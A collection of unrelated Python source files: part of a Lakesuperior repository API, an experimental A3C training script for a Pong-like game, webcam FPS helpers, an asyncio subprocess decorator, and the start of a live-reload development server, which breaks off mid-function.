subjects = set(remove_dict.keys()) | set(add_dict.keys())
for rsrc_uri in subjects:
logger.debug('Processing event for subject: {}'.format(rsrc_uri))
env.app_globals.messenger.send(rsrc_uri, **metadata)
### API METHODS ###
@transaction()
def exists(uid):
"""
Return whether a resource exists (is stored) in the repository.
:param string uid: Resource UID.
"""
try:
exists = LdpFactory.from_stored(uid).is_stored
except ResourceNotExistsError:
exists = False
return exists
@transaction()
def get_metadata(uid):
"""
Get metadata (admin triples) of an LDPR resource.
:param string uid: Resource UID.
"""
return LdpFactory.from_stored(uid).metadata
@transaction()
def get(uid, repr_options={}):
"""
Get an LDPR resource.
The resource comes preloaded with user data and metadata as indicated by
the `repr_options` argument. Any further handling of this resource is done
outside of a transaction.
:param string uid: Resource UID.
:param repr_options: (dict(bool)) Representation options. This is a dict
that is unpacked downstream in the process. The default empty dict
results in default values. The accepted dict keys are:
- incl_inbound: include inbound references. Default: False.
- incl_children: include children URIs. Default: True.
- embed_children: Embed full graph of all child resources. Default: False
"""
rsrc = LdpFactory.from_stored(uid, repr_opts=repr_options)
# Load graph before leaving the transaction.
rsrc.imr
return rsrc
@transaction()
def get_version_info(uid):
"""
Get version metadata (fcr:versions).
"""
return LdpFactory.from_stored(uid).version_info
@transaction()
def get_version(uid, ver_uid):
"""
Get version metadata (fcr:versions).
"""
return LdpFactory.from_stored(uid).get_version(ver_uid)
@transaction(True)
def create(parent, slug=None, **kwargs):
r"""
Mint a new UID and create a resource.
The UID is computed from a given parent UID and a "slug", a proposed path
relative to the parent. The application will attempt to use the suggested
path but it may use a different one if a conflict with an existing resource
arises.
:param str parent: UID of the parent resource.
:param str slug: Tentative path relative to the parent UID.
:param \*\*kwargs: Other parameters are passed to the
:py:meth:`~lakesuperior.model.ldp.ldp_factory.LdpFactory.from_provided`
method.
:rtype: tuple(str, lakesuperior.model.ldp.ldpr.Ldpr)
:return: A tuple of:
1. Event type (str): whether the resource was created or updated.
2. Resource (lakesuperior.model.ldp.ldpr.Ldpr): The new or updated resource.
"""
uid = LdpFactory.mint_uid(parent, slug)
logger.debug('Minted UID for new resource: {}'.format(uid))
rsrc = LdpFactory.from_provided(uid, **kwargs)
rsrc.create_or_replace(create_only=True)
return rsrc
@transaction(True)
def create_or_replace(uid, **kwargs):
r"""
Create or replace a resource with a specified UID.
:param string uid: UID of the resource to be created or updated.
:param \*\*kwargs: Other parameters are passed to the
:py:meth:`~lakesuperior.model.ldp.ldp_factory.LdpFactory.from_provided`
method.
:rtype: tuple(str, lakesuperior.model.ldp.ldpr.Ldpr)
:return: A tuple of:
1. Event type (str): whether the resource was created or updated.
2. Resource (lakesuperior.model.ldp.ldpr.Ldpr): The new or updated
resource.
"""
rsrc = LdpFactory.from_provided(uid, **kwargs)
return rsrc.create_or_replace(), rsrc
@transaction(True)
def update(uid, update_str, is_metadata=False, handling='strict'):
"""
Update a resource with a SPARQL-Update string.
:param string uid: Resource UID.
:param string update_str: SPARQL-Update statements.
:param bool is_metadata: Whether the resource metadata are being updated.
:param str handling: How to handle server-managed triples. ``strict``
(the default) rejects the update with an exception if server-managed
triples are being changed. ``lenient`` modifies the update graph so
offending triples are removed and the update can be applied.
:raise InvalidResourceError: If ``is_metadata`` is False and the resource
being updated is a LDP-NR.
"""
rsrc = LdpFactory.from_stored(uid, handling=handling)
if LDP_NR_TYPE in rsrc.ldp_types and not is_metadata:
raise InvalidResourceError(
'Cannot use this method to update an LDP-NR content.')
delta = rsrc.sparql_delta(update_str)
rsrc.modify(RES_UPDATED, *delta)
return rsrc
@transaction(True)
def update_delta(uid, remove_trp, add_trp):
"""
Update a resource graph (LDP-RS or LDP-NR) with sets of add/remove triples.
A set of triples to add and/or a set of triples to remove may be provided.
:param string uid: Resource UID.
:param set(tuple(rdflib.term.Identifier)) remove_trp: Triples to
remove, as 3-tuples of RDFLib terms.
:param set(tuple(rdflib.term.Identifier)) add_trp: Triples to
add, as 3-tuples of RDFLib terms.
"""
rsrc = LdpFactory.from_stored(uid)
# FIXME Wrong place to put this, should be at the LDP level.
remove_trp = {
(rel_uri_to_urn(s, uid), p, rel_uri_to_urn(o, uid))
for s, p, o in remove_trp
}
add_trp = {
(rel_uri_to_urn(s, uid), p, rel_uri_to_urn(o, uid))
for s, p, o in add_trp
}
remove_trp = rsrc.check_mgd_terms(remove_trp)
add_trp = rsrc.check_mgd_terms(add_trp)
return rsrc.modify(RES_UPDATED, remove_trp, add_trp)
@transaction(True)
def create_version(uid, ver_uid):
"""
Create a resource version.
:param string uid: Resource UID.
:param string ver_uid: Version UID to be appended to the resource URI.
NOTE: this is a "slug", i.e. the version URI is not guaranteed to be the
one indicated.
:rtype: str
:return: Version UID.
"""
return LdpFactory.from_stored(uid).create_version(ver_uid)
@transaction(True)
def delete(uid, soft=True, inbound=True):
"""
Delete a resource.
:param string uid: Resource UID.
:param bool soft: Whether to perform a soft-delete and leave a
tombstone resource, or wipe any memory of the resource.
"""
# If referential integrity is enforced, grab all inbound relationships
# to break them.
refint = env.app_globals.rdfly.config['referential_integrity']
inbound = True if refint else inbound
if soft:
repr_opts = {'incl_inbound' : True} if inbound else {}
rsrc = LdpFactory.from_stored(uid, repr_opts)
return rsrc.bury(inbound)
else:
Ldpr.forget(uid, inbound)
@transaction(True)
def revert_to_version(uid, ver_uid):
"""
Restore a resource to a previous version state.
:param str uid: Resource UID.
:param str ver_uid: Version UID.
"""
return LdpFactory.from_stored(uid).revert_to_version(ver_uid)
@transaction(True)
def resurrect(uid):
"""
Reinstate a buried (soft-deleted) resource.
:param str uid: Resource UID.
"""
try:
rsrc = LdpFactory.from_stored(uid)
except TombstoneError as e:
if e.uid != uid:
raise
else:
return LdpFactory.from_stored(uid, strict=False).resurrect()
else:
raise InvalidResourceError(
uid, msg='Resource {} is not dead.'.format(uid))
|
a3c_tryout_2.py | # Baby Advantage Actor-Critic | Sam Greydanus | October 2017 | MIT License
from __future__ import print_function
import torch, os, gym, time, glob, argparse, sys
import numpy as np
from scipy.signal import lfilter
# from scipy.misc import imresize # preserves single-pixel info _unlike_ img = img[::2,::2]
from collections import deque
import torch.nn as nn
import torch.nn.functional as F
import torch.multiprocessing as mp
import wimblepong
import cv2
os.environ['OMP_NUM_THREADS'] = '1'
def get_args():
parser = argparse.ArgumentParser(description=None)
parser.add_argument('--env', default='Breakout-v4', type=str, help='gym environment')
parser.add_argument('--processes', default=20, type=int, help='number of processes to train with')
parser.add_argument('--render', default=False, type=bool, help='renders the atari environment')
parser.add_argument('--test', default=False, type=bool, help='sets lr=0, chooses most likely actions')
parser.add_argument('--rnn_steps', default=20, type=int, help='steps to train LSTM over')
parser.add_argument('--lr', default=1e-4, type=float, help='learning rate')
parser.add_argument('--seed', default=1, type=int, help='seed random # generators (for reproducibility)')
parser.add_argument('--gamma', default=0.99, type=float, help='rewards discount factor')
parser.add_argument('--tau', default=95, type=float, help='generalized advantage estimation discount')
parser.add_argument('--horizon', default=0.99, type=float, help='horizon for running averages')
parser.add_argument('--hidden', default=256, type=int, help='hidden size of GRU')
return parser.parse_args()
discount = lambda x, gamma: lfilter([1],[1,-gamma],x[::-1])[::-1] # discounted rewards one liner
def prepro(obs, target_reso=(40, 40)):
# print('here lol')
return np.dot(cv2.resize(obs[...,:3], dsize=target_reso), \
[0.2989, 0.5870, 0.1140]).astype('float32')/255.0
def printlog(args, s, end='\n', mode='a'):
print(s, end=end) ; f=open(args.save_dir+'log.txt',mode) ; f.write(s+'\n') ; f.close()
class NNPolicy(nn.Module): # an actor-critic neural network
def __init__(self, channels, memsize, num_actions):
super(NNPolicy, self).__init__()
self.conv1 = nn.Conv2d(channels, 32, 3, stride=2, padding=1)
self.conv2 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.conv3 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.conv4 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.gru = nn.GRUCell(32 * 3 * 3, memsize)
self.critic_linear, self.actor_linear = nn.Linear(memsize, 1), nn.Linear(memsize, num_actions)
def forward(self, inputs, train=True, hard=False):
inputs, hx = inputs
# inputs = inputs.view(-1, 1, 80-)
x = F.elu(self.conv1(inputs))
x = F.elu(self.conv2(x))
x = F.elu(self.conv3(x))
x = F.elu(self.conv4(x))
# print(x.shape)
hx = self.gru(x.view(-1, 32 * 3 * 3), (hx))
return self.critic_linear(hx), self.actor_linear(hx), hx
def try_load(self, save_dir):
paths = glob.glob(save_dir + '*.tar') ; step = 0
if len(paths) > 0:
ckpts = [int(s.split('.')[-2]) for s in paths]
ix = np.argmax(ckpts) ; step = ckpts[ix]
self.load_state_dict(torch.load(paths[ix]))
print("\tno saved models") if step is 0 else print("\tloaded model: {}".format(paths[ix]))
return step
class SharedAdam(torch.optim.Adam): # extend a pytorch optimizer so it shares grads across processes
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
super(SharedAdam, self).__init__(params, lr, betas, eps, weight_decay)
for group in self.param_groups:
for p in group['params']:
state = self.state[p]
state['shared_steps'], state['step'] = torch.zeros(1).share_memory_(), 0
state['exp_avg'] = p.data.new().resize_as_(p.data).zero_().share_memory_()
state['exp_avg_sq'] = p.data.new().resize_as_(p.data).zero_().share_memory_()
def step(self, closure=None):
for group in self.param_groups:
for p in group['params']:
if p.grad is None: continue
self.state[p]['shared_steps'] += 1
self.state[p]['step'] = self.state[p]['shared_steps'][0] - 1 # a "step += 1" comes later
super.step(closure)
def cost_func(args, values, logps, actions, rewards):
np_values = values.view(-1).data.numpy()
# generalized advantage estimation using \delta_t residuals (a policy gradient method)
delta_t = np.asarray(rewards) + args.gamma * np_values[1:] - np_values[:-1]
logpys = logps.gather(1, actions.clone().detach().view(-1,1))
gen_adv_est = discount(delta_t, args.gamma * args.tau)
policy_loss = -(logpys.view(-1) * torch.FloatTensor(gen_adv_est.copy())).sum()
# l2 loss over value estimator
rewards[-1] += args.gamma * np_values[-1]
discounted_r = discount(np.asarray(rewards), args.gamma)
discounted_r = torch.tensor(discounted_r.copy(), dtype=torch.float32)
value_loss = .5 * (discounted_r - values[:-1,0]).pow(2).sum()
entropy_loss = (-logps * torch.exp(logps)).sum() # entropy definition, for entropy regularization
return policy_loss + 0.5 * value_loss - 0.01 * entropy_loss
def train(shared_model, shared_optimizer, rank, args, info):
if rank == 1: from tensorboardX import SummaryWriter
env = gym.make("WimblepongVisualMultiplayer-v0")
env.seed(args.seed + rank) ; torch.manual_seed(args.seed + rank) # seed everything
model = NNPolicy(channels=1, memsize=args.hidden, num_actions=args.num_actions) # a local/unshared model
state, state2 = env.reset()
state, state2 = torch.tensor(prepro(state)), torch.tensor(prepro(state2))
opponent_id = 2
opponent = wimblepong.SimpleAi(env, opponent_id)
use_simpleAI = True
if rank == 1: writer = SummaryWriter()
running_winrate = deque([0 for i in range(100)], maxlen=100)
start_time = last_disp_time = time.time()
episode_length, epr, eploss, done = 0, 0, 0, True # bookkeeping
if rank == 1: episode_number = 0
while info['frames'][0] <= 8e7 or args.test: # openai baselines uses 40M frames...we'll use 80M
model.load_state_dict(shared_model.state_dict()) # sync with shared model
hx = torch.zeros(1, 256) if done else hx.detach() # rnn activation vector
hx_ = torch.zeros(1, 256) if done else hx_.detach() # rnn activation vector
values, logps, actions, rewards = [], [], [], [] # save values for computing gradientss
##done = False
while args.rnn_steps:
# print(state.view(1,1,40,40))
# Step the environment and get the rewards and new observations
# (ob1, ob2), (rew1, rew2), done, info = env.step((action1, action2))f
action_ = opponent.get_action()
if not use_simpleAI:
with torch.no_grad():
value_, logit_, hx_ = model((state2.view(1,1,40,40), hx_))
logp_ = F.log_softmax(logit_, dim=-1)
action_ = torch.exp(logp_).multinomial(num_samples=1).data[0]#logp.max(1)[1].data if args.test else
action_ = action_.numpy()[0]
# print(type(state))
value, logit, hx = model((state.view(1,1,40,40), hx))
logp = F.log_softmax(logit, dim=-1)
action = torch.exp(logp).multinomial(num_samples=1).data[0]#logp.max(1)[1].data if args.test else
# state, reward, done, _ = env.step(action.numpy()[0])
(state, state2), (reward, reward2), done, _ = env.step((action.numpy()[0], action_))
if args.render: env.render()
state = torch.tensor(prepro(state)) ; epr += reward
if not use_simpleAI: state2 = torch.tensor(prepro(state2))
# reward = np.clip(reward, -1, 1) # reward
done = done or episode_length >= 1e4 # don't playing one ep for too long
info['frames'].add_(1) ; num_frames = int(info['frames'].item())
if num_frames % 2e6 == 0: # save every 2M frames
printlog(args, '\n\t{:.0f}M frames: saved model\n'.format(num_frames/1e6))
torch.save(shared_model.state_dict(), args.save_dir+'model.{:.0f}.tar'.format(num_frames/1e6))
if done: # update shared data
if reward == 10:
running_winrate.append(1)
else:
running_winrate.append(0)
strong_ai_prob = np.sum(running_winrate)/len(running_winrate)
# use_simpleAI = torch.rand(1).item() >= strong_ai_prob
use_simpleAI = strong_ai_prob <= 0.9
if rank == 1: writer.add_scalar('winrate', strong_ai_prob, episode_number)
if rank == 1: episode_number += 1
info['episodes'] += 1
interp = 1 if info['episodes'][0] == 1 else 1 - args.horizon
info['run_epr'].mul_(1-interp).add_(interp * epr)
info['run_loss'].mul_(1-interp).add_(interp * eploss)
if rank == 0 and time.time() - last_disp_time > 60: # print info ~ every minute
elapsed = time.strftime("%Hh %Mm %Ss", time.gmtime(time.time() - start_time))
printlog(args, 'time {}, episodes {:.0f}, frames {:.1f}M, mean epr {:.2f}, run loss {:.2f}'
.format(elapsed, info['episodes'].item(), num_frames/1e6,
info['run_epr'].item(), info['run_loss'].item()))
last_disp_time = time.time()
if done: # maybe print info.
hx = torch.zeros(1, 256)
hx_ = torch.zeros(1, 256)
episode_length, epr, eploss = 0, 0, 0
state, state2 = env.reset()
state = torch.tensor(prepro(state))
if not use_simpleAI:
state2 = torch.tensor(prepro(state2))
values.append(value) ; logps.append(logp) ; actions.append(action) ; rewards.append(reward)
# print(state.shape)
next_value = torch.zeros(1,1) if done else model((state.view(-1, 1, 40, 40), hx))[0]
values.append(next_value.detach())
loss = cost_func(args, torch.cat(values), torch.cat(logps), torch.cat(actions), np.asarray(rewards))
eploss += loss.item()
shared_optimizer.zero_grad() ; loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 40)
for param, shared_param in zip(model.parameters(), shared_model.parameters()):
if shared_param.grad is None: shared_param._grad = param.grad # sync gradients with shared model
shared_optimizer.step()
if rank == 1: wirter.close()
if __name__ == "__main__":
if sys.version_info[0] > 2:
mp.set_start_method('spawn') # this must not be in global scope
elif sys.platform == 'linux' or sys.platform == 'linux2':
raise "Must be using Python 3 with linux!" # or else you get a deadlock in conv2d
args = get_args()
args.save_dir = '{}/'.format(args.env.lower()) # keep the directory structure simple
if args.render: args.processes = 1 ; args.test = True # render mode -> test mode w one process
if args.test: args.lr = 0 # don't train in render mode
args.num_actions = gym.make('WimblepongVisualSimpleAI-v0').action_space.n # get the action space of this game
os.makedirs(args.save_dir) if not os.path.exists(args.save_dir) else None # make dir to save models etc.
torch.manual_seed(args.seed)
shared_model = NNPolicy(channels=1, memsize=args.hidden, num_actions=args.num_actions).share_memory()
shared_optimizer = SharedAdam(shared_model.parameters(), lr=args.lr)
info = {k: torch.DoubleTensor([0]).share_memory_() for k in ['run_epr', 'run_loss', 'episodes', 'frames']}
# CHANGE THIS, temporally using this shit
info['frames'] += shared_model.try_load(args.env) * 1e6
if int(info['frames'].item()) == 0: printlog(args,'', end='', mode='w') # clear log file
processes = []
for rank in range(args.processes):
p = mp.Process(target=train, args=(shared_model, shared_optimizer, rank, args, info))
p.start() ; processes.append(p)
for p in processes: p.join()
|
utils.py | # From http://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/
import cv2
import datetime
from threading import Thread
class FPS:
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self._numFrames = 0
def start(self):
# start the timer
self._start = datetime.datetime.now()
return self
def stop(self):
# stop the timer
self._end = datetime.datetime.now()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self._numFrames += 1
def elapsed(self):
# return the total number of seconds between the start and
# end interval
return (self._end - self._start).total_seconds()
def fps(self):
# compute the (approximate) frames per second
return self._numFrames / self.elapsed()
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True |
concurrent.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File : Ampel-core/ampel/util/concurrent.py
# License : BSD-3-Clause
# Author : Jakob van Santen <jakob.van.santen@desy.de>
# Date : 07.08.2020
# Last Modified Date: 07.08.2020
# Last Modified By : Jakob van Santen <jakob.van.santen@desy.de>
"""
Simple decorator for running a function in subprocess with asyncio, adapted
from pebble.concurrent.process. Like pebble, the future returned by the
decorated function can be cancelled to terminate the underlying subprocess.
Unlike pebble (or concurrent.futures.ProcessPoolExecutor), no extra Python
threads are needed to manage the process lifecycle.
"""
import asyncio, io, itertools, os, signal, sys, traceback
from typing import Any, Dict, Set
from functools import wraps, partial
from multiprocessing import reduction, spawn # type: ignore
from multiprocessing.context import set_spawning_popen
from subprocess import _args_from_interpreter_flags # type: ignore
import ampel.vendor.aiopipe as aiopipe # type: ignore
from ampel.metrics.prometheus import prometheus_cleanup_worker, prometheus_setup_worker
def process(function=None, **kwargs):
"""
Runs the decorated function in a concurrent process. All arguments and
return values must be pickleable.
The decorated function will return an asyncio.Task that can be awaited in
an event loop. The task will complete when the function returns or raises
an exception. If the task is cancelled, the process will be terminated.
"""
if function is None:
return partial(_process_wrapper, **kwargs)
else:
return _process_wrapper(function)
class RemoteTraceback(Exception):
"""Traceback wrapper for exceptions in remote process.
Exception.__cause__ requires a BaseException subclass.
"""
def __init__(self, traceback):
self.traceback = traceback
def __str__(self):
return self.traceback
class RemoteException(BaseException):
"""Pickling wrapper for exceptions in remote process."""
def __init__(self, exception, traceback):
self.exception = exception
self.traceback = traceback
def __reduce__(self):
return rebuild_exception, (self.exception, self.traceback)
def rebuild_exception(exception, traceback):
exception.__cause__ = RemoteTraceback(traceback)
return exception
def prepare(data):
"stripped-down version of multiprocessing.spawn.prepare()"
if "sys_path" in data:
sys.path = data["sys_path"]
if "sys_argv" in data:
sys.argv = data["sys_argv"]
if "dir" in data:
os.chdir(data["dir"])
if "init_main_from_name" in data:
spawn._fixup_main_from_name(data["init_main_from_name"])
elif "init_main_from_path" in data:
spawn._fixup_main_from_path(data["init_main_from_path"])
if "process_name" in data:
prometheus_setup_worker({"process": data["process_name"]})
def spawn_main(read_fd, write_fd):
"""
Execute pickled _Process received over pipe
"""
with open(read_fd, "rb") as rx:
preparation_data = reduction.pickle.load(rx)
prepare(preparation_data)
obj = reduction.pickle.load(rx)
ret = None
exitcode = 1
try:
ret = obj()
exitcode = 0
payload = reduction.pickle.dumps(ret)
except Exception as error:
error.traceback = traceback.format_exc()
ret = RemoteException(error, error.traceback)
payload = reduction.pickle.dumps(ret)
try:
with open(write_fd, "wb") as tx:
tx.write(payload)
except Exception:
print(f"Process {obj._name} (pid {os.getpid()}):", file=sys.stderr)
traceback.print_exc(file=sys.stderr)
exitcode = 1
sys.exit(exitcode)
class _Process:
_counter = itertools.count(1)
#: PIDs for active processes str -> (pid -> replica), used by AmpelProcessCollector
_active: Dict[str, Dict[int, int]] = {}
#: Replica ids that can be recycled
_expired: Dict[str, Set[int]] = {}
def __init__(self, target=None, name=None, timeout=3.0, args=(), kwargs={}):
self._target = target
count = next(self._counter)
# infer the process name from a ProcessModel-like dict
if name is None:
for arg in args:
if isinstance(arg, dict) and "name" in arg:
self._name = arg["name"]
break
else:
self._name = f"{count}"
else:
self._name = name
self._timeout = timeout
self._args = tuple(args)
self._kwargs = dict(kwargs)
def __call__(self):
if self._target:
return self._target(*self._args, **self._kwargs)
def _get_command_line(self, read_fd, write_fd):
return (
spawn.get_executable(),
*_args_from_interpreter_flags(),
"-c",
f"from ampel.util.concurrent import spawn_main; spawn_main({read_fd}, {write_fd})",
)
async def launch(self) -> Any:
prep_data = spawn.get_preparation_data(self._name)
prep_data["process_name"] = self._name
fp = io.BytesIO()
set_spawning_popen(self)
try:
reduction.dump(prep_data, fp)
reduction.dump(self, fp)
finally:
set_spawning_popen(None)
parent_r, child_w = aiopipe.aiopipe()
child_r, parent_w = aiopipe.aiopipe()
with child_r.detach() as crx, child_w.detach() as ctx:
proc = await asyncio.subprocess.create_subprocess_exec(
*self._get_command_line(crx._fd, ctx._fd),
pass_fds=sorted(p._fd for p in (crx, ctx)),
start_new_session=True,
)
# Processes labeled with the same name are identified by replica number
# for monitoring purposes. Numbers are reused from smallest to largest
# in order to keep their cardinality as small as possible, e.g. if
# replicas 0,1,3,4 are live, the next number should be 2.
if self._name in self._active:
replica_idx = expired.pop() if (expired := self._expired.get(self._name, None)) else max(self._active[self._name].keys())+1
self._active[self._name][replica_idx] = proc.pid
else:
replica_idx = 0
self._active[self._name] = {replica_idx: proc.pid}
try:
async with parent_w.open() as tx:
tx.write(fp.getbuffer())
await tx.drain()
async with parent_r.open() as rx:
try:
exitcode, payload = await asyncio.gather(
proc.wait(), rx.read(), return_exceptions=True
)
if isinstance(exitcode, BaseException):
raise exitcode
elif exitcode < 0:
signame = signal.Signals(-exitcode).name
raise RuntimeError(f"Process {self._name} (pid {proc.pid}) died on {signame}")
if isinstance(payload, BaseException):
raise payload
else:
ret = reduction.pickle.loads(payload)
if isinstance(ret, BaseException):
raise ret
else:
return ret
except asyncio.CancelledError:
proc.terminate()
try:
await asyncio.wait_for(proc.wait(), self._timeout)
except asyncio.TimeoutError:
proc.kill()
await asyncio.gather(proc.wait(), rx.read())
raise
finally:
# Clean up replica numbers and pids
del self._active[self._name][replica_idx]
if not self._active[self._name]:
# only process active, reset everything
del self._active[self._name]
self._expired.pop(self._name, None)
else:
# at least one other process of the same name; recycle replica
if self._name in self._expired:
self._expired[self._name].add(replica_idx)
else:
self._expired[self._name] = {replica_idx}
if "PROMETHEUS_MULTIPROC_DIR" in os.environ:
prometheus_cleanup_worker(proc.pid)
_registered_functions = {}
def _register_function(function):
global _registered_functions
_registered_functions[(function.__qualname__, function.__module__)] = function
def _trampoline(name, module, *args, **kwargs):
"""Trampoline function for decorators.
Lookups the function between the registered ones;
if not found, forces its registering and then executes it.
"""
function = _function_lookup(name, module)
return function(*args, **kwargs)
def _function_lookup(name, module):
"""Searches the function between the registered ones.
If not found, it imports the module forcing its registration.
"""
if module == "__main__":
module = "__mp_main__"
try:
return _registered_functions[(name, module)]
except KeyError: # force function registering
__import__(module)
return _registered_functions[(name, module)]
def _process_wrapper(function, timeout=3.0):
# keep the wrapped function so we can actually call it
_register_function(function)
@wraps(function)
def wrapper(*args, **kwargs):
target = _trampoline
args = [function.__qualname__, function.__module__] + list(args)
proc = _Process(target=target, timeout=timeout, args=args, kwargs=kwargs)
return asyncio.create_task(proc.launch())
return wrapper
|
__init__.py | import functools
import io
import logging
import mimetypes
import os
import os.path
import pathlib
import re
import socketserver
import threading
import time
import warnings
import wsgiref.simple_server
import watchdog.events
import watchdog.observers
class _LoggerAdapter(logging.LoggerAdapter):
def process(self, msg, kwargs):
return time.strftime("[%H:%M:%S] ") + msg, kwargs
log = _LoggerAdapter(logging.getLogger(__name__), {})
class LiveReloadServer(socketserver.ThreadingMixIn, wsgiref.simple_server.WSGIServer):
daemon_threads = True
poll_response_timeout = 60
def __init__(
self,
builder,
host,
port,
root,
mount_path="/",
build_delay=0.25,
shutdown_delay=0.25,
**kwargs,
):
self.builder = builder
self.server_name = host
self.server_port = port
self.root = os.path.abspath(root)
self.mount_path = ("/" + mount_path.lstrip("/")).rstrip("/") + "/"
self.url = f"http://{self.server_name}:{self.server_port}{self.mount_path}"
self.build_delay = build_delay
self.shutdown_delay = shutdown_delay
# To allow custom error pages.
self.error_handler = lambda code: None
super().__init__((host, port), _Handler, **kwargs)
self.set_app(self.serve_request)
self._wanted_epoch = _timestamp() # The version of the site that started building.
self._visible_epoch = self._wanted_epoch # Latest fully built version of the site.
self._epoch_cond = threading.Condition() # Must be held when accessing _visible_epoch.
self._to_rebuild = {} # Used as an ordered set of functions to call.
self._rebuild_cond = threading.Condition() # Must be held when accessing _to_rebuild.
self._shutdown = False
self.serve_thread = threading.Thread(target=lambda: self.serve_forever(shutdown_delay))
self.observer = watchdog.observers.Observer(timeout=shutdown_delay)
def watch(self, path, func=None, recursive=True):
"""Add the 'path' to watched paths, call the function and reload when any file changes under it."""
path = os.path.abspath(path)
if func in (None, self.builder):
func = self.builder
else:
warnings.warn(
"Plugins should not pass the 'func' parameter of watch(). "
"The ability to execute custom callbacks will be removed soon.",
DeprecationWarning,
stacklevel=2,
)
def callback(event, allowed_path=None):
if isinstance(event, watchdog.events.DirCreatedEvent):
return
if allowed_path is not None and event.src_path != allowed_path:
return
# Text editors always cause a "file close" event in addition to "modified" when saving
# a file. Some editors also have "swap" functionality that keeps writing into another
# file that's never closed. Prevent such write events from causing a rebuild.
if isinstance(event, watchdog.events.FileModifiedEvent):
# But FileClosedEvent is implemented only on Linux, otherwise we mustn't skip this:
if type(self.observer).__name__ == "InotifyObserver":
return
log.debug(str(event))
with self._rebuild_cond:
self._to_rebuild[func] = True
self._rebuild_cond.notify_all()
dir_handler = watchdog.events.FileSystemEventHandler()
dir_handler.on_any_event = callback
seen = set()
def schedule(path):
seen.add(path)
if path.is_file():
# Watchdog doesn't support watching files, so watch its directory and filter by path
handler = watchdog.events.FileSystemEventHandler()
handler.on_any_event = lambda event: callback(event, allowed_path=os.fspath(path))
parent = path.parent
log.debug(f"Watching file '{path}' through directory '{parent}'")
self.observer.schedule(handler, parent)
else:
log.debug(f"Watching directory '{path}'")
self.observer.schedule(dir_handler, path, recursive=recursive)
schedule(pathlib.Path(path).resolve())
def watch_symlink_targets(path_obj): # path is os.DirEntry or pathlib.Path
if path_obj.is_symlink():
path_obj = pathlib.Path(path_obj).resolve()
if path_obj in seen or not path_obj.exists():
return
schedule(path_obj)
if path_obj.is_dir() and recursive:
with os.scandir(os.fspath(path_obj)) as scan:
for entry in scan:
watch_symlink_targets(entry)
watch_symlink_targets(pathlib.Path(path))
def serve(self):
self.observer.start()
log.info(f"Serving on {self.url}")
self.serve_thread.start()
self._build_loop()
def _build_loop(self):
while True:
with self._rebuild_cond:
while not self._rebuild_cond.wait_for(
lambda: self._to_rebuild or self._shutdown, timeout=self.shutdown_delay
):
# We could have used just one wait instead of a loop + timeout, but we need
# occasional breaks, otherwise on Windows we can't receive KeyboardInterrupt.
pass
if self._shutdown:
break
log.info("Detected file changes")
while self._rebuild_cond.wait(timeout=self.build_delay):
log.debug("Waiting for file changes to stop happening")
self._wanted_epoch = _timestamp()
funcs = list(self._to_rebuild)
self._to_rebuild.clear()
for func in funcs:
func()
with self._epoch_cond:
log.info("Reloading browsers")
self._visible_epoch = self._wanted_epoch
self._epoch_cond.notify_all()
def shutdown(self):
self.observer.stop()
with self._rebuild_cond:
self._shutdown = True
self._rebuild_cond.notify_all()
if self.serve_thread.is_alive():
super().shutdown()
self.serve_thread.join()
self.observer.join()
def serve_request(self, environ, start_response):
try:
result = self._serve_request(environ, start_response)
except Exception:
code = 500
msg = "500 Internal Server Error"
log.exception(msg)
else:
if result is not None:
return result
code = 404
msg = "404 Not Found"
error_content = None
try:
error_content = self.error_handler(code)
except Exception:
log.exception("Failed to render an error message!")
if error_content is None:
error_content = msg.encode()
start_response(msg, [("Content-Type", "text/html")])
return [error_content]
def _serve_request(self, environ, start_response):
# https://bugs.python.org/issue16679
# https://github.com/bottlepy/bottle/blob/f9b1849db4/bottle.py#L984
path = environ["PATH_INFO"].encode("latin-1").decode("utf-8", "ignore")
m = re.fullmatch(r"/livereload/([0-9]+)/[0-9]+", path)
if m:
epoch = int(m[1])
start_response("200 OK", [("Content-Type", "text/plain")])
def condition():
return self._visible_epoch > epoch
with self._epoch_cond:
if not condition():
# Stall the browser, respond as soon as there's something new.
# If there's not, respond anyway after a minute.
self._log_poll_request(environ.get("HTTP_REFERER"), request_id=path)
self._epoch_cond.wait_for(condition, timeout=self.poll_response_timeout)
return [b"%d" % self._visible_epoch]
if path == "/js/livereload.js":
file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "livereload.js")
elif path.startswith(self.mount_path):
if path.endswith("/"):
path += "index.html"
path = path[len(self.mount_path):]
file_path = os.path.join(self.root, path.lstrip("/"))
elif path == "/":
start_response("302 Found", [("Location", self.mount_path)])
return []
else:
return None # Not found
# Wait until the ongoing rebuild (if any) finishes, so we're not serving a half-built site.
with self._epoch_cond:
self._epoch_cond.wait_for(lambda: self._visible_epoch == self._wanted_epoch)
epoch = self._visible_epoch
try:
file = open(file_path, "rb")
except OSError:
return None # Not found
if path.endswith(".html"):
with file:
content = file.read()
content = self._inject_js_into_html(content, epoch)
file = io.BytesIO(content)
content_length = len(content)
else:
content_length = os.path.getsize(file_path)
content_type = self._guess_type(file_path)
start_response(
"200 OK", [("Content-Type", content_type), ("Content-Length", str(content_length))]
)
return wsgiref.util.FileWrapper(file)
@classmethod
def _inject_js_into_html(cls, content, epoch):
try:
body_end = content.rindex(b"</body>")
except ValueError:
body_end = len(content)
